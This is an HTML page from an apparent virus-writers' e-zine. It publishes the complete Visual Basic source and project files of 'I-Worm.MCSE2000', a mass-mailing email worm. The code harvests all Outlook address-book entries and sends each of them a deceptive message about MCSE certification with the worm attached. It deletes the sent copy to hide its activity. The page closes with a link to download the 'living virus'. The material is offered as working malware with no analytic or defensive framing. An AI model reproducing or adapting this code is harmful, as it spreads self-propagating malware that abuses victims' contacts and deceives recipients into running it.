<html>
<head>
<title>rRlf #1</title>
</head>
<body text="#000000" link="#ff0000" vlink="#ff0000" alink="#ff0000" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>When the going gets weird the weird turn pro</i>
<br><table cellpadding="9">
<tr>
<th><a href="12.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="14.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>Trojaner.Win32.SendExe by Energy</u></b>
<p>A simple vb trojan/worm.
<p><u>file Mcse2000.bas:</u>
<p>'by Energy
<br>Attribute VB_Name = "MCSE2000"
<br>Dim Outlook As Object
<br>Sub Main()
<br>On Error Resume Next
<br>MyFullExeName = App.Path & App.EXEName & ".exe"
<br>If Right(App.Path, 1) <> "\" Then MyFullExeName = App.Path & "\" & App.EXEName & ".exe"
<br>Set Outlook = CreateObject("Outlook.Application")
<br>Set Mapi = Outlook.GetNameSpace("MAPI")
<br>AdressList = "support@microsoft.com"
<br>For Each Adress In Mapi.AddressLists
<br>&nbsp;For i = 1 To Adress.AddressEntries.Count
<br>&nbsp;&nbsp;AdressList = AdressList & ";" & Adress.AddressEntries(i)
<br>&nbsp;Next
<br>Next
<br>Set Out = Outlook.CreateItem(0)
<br>&nbsp;Out.Subject = "MCSE2000 Informations"
<br>&nbsp;Out.Body = "Hi," & vbCrLf & _
<br>&nbsp;&nbsp;&nbsp;&nbsp;"I have here a lot of New Information, about the MCSE2000." & vbCrLf & _
<br>&nbsp;&nbsp;&nbsp;&nbsp;"The Certification isnt not longer requested." & vbCrLf & _
<br>&nbsp;&nbsp;&nbsp;&nbsp;"Please visit the attachment file." & vbCrLf & vbCrLf & _
<br>&nbsp;&nbsp;&nbsp;&nbsp;"bye  "
<br>&nbsp;Out.BCC = AdressList
<p>&nbsp;Out.Attachments.Add MyFullExeName
<br>&nbsp;Out.DeleteAfterSubmit = True
<p>'Out.Importance = ImportanceHigh
<br>&nbsp;Out.Send
<br>End
<br>End Sub
<br>&nbsp;
<br>&nbsp;
<br><u>file Mcse2000.vbp:</u>
<p>Type=Exe
<br>Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\WINNT\System32\stdole2.tlb#OLE Automation
<br>Module=MCSE2000; MCSE2000.bas
<br>Startup="Sub Main"
<br>HelpFile=""
<br>Title="I-Worm.MCSE2000"
<br>ExeName32="MCSE2000.exe"
<br>Path32="..\..\..\..\..\Dokummente und Einstellungen\energy\all users\desktop\MCSE2000"
<br>Command32=""
<br>Name="MCSE2000"
<br>HelpContextID="0"
<br>CompatibleMode="0"
<br>MajorVer=1
<br>MinorVer=0
<br>RevisionVer=0
<br>AutoIncrementVer=0
<br>ServerSupportFiles=0
<br>VersionCompanyName="[TN]"
<br>VersionFileDescription="I-Worm.MCSE2000"
<br>VersionProductName="I-Worm.MCSE2000"
<br>CompilationType=-1
<br>OptimizationType=0
<br>FavorPentiumPro(tm)=0
<br>CodeViewDebugInfo=0
<br>NoAliasing=0
<br>BoundsCheck=0
<br>OverflowCheck=0
<br>FlPointCheck=0
<br>FDIVCheck=0
<br>UnroundedFP=0
<br>StartMode=0
<br>Unattended=0
<br>ThreadPerObject=0
<br>MaxNumberOfThreads=1
<p>[MS Transaction Server]
<br>AutoRefresh=1
<br>&nbsp;
<br>&nbsp;
<br><u>file Mcse2000.vbw:</u>
<p>Body = 66, 66, 727, 523, Z
<br>&nbsp;
<br>&nbsp;
<br><a href="13.zip">living virus</a>
</body>
</html>
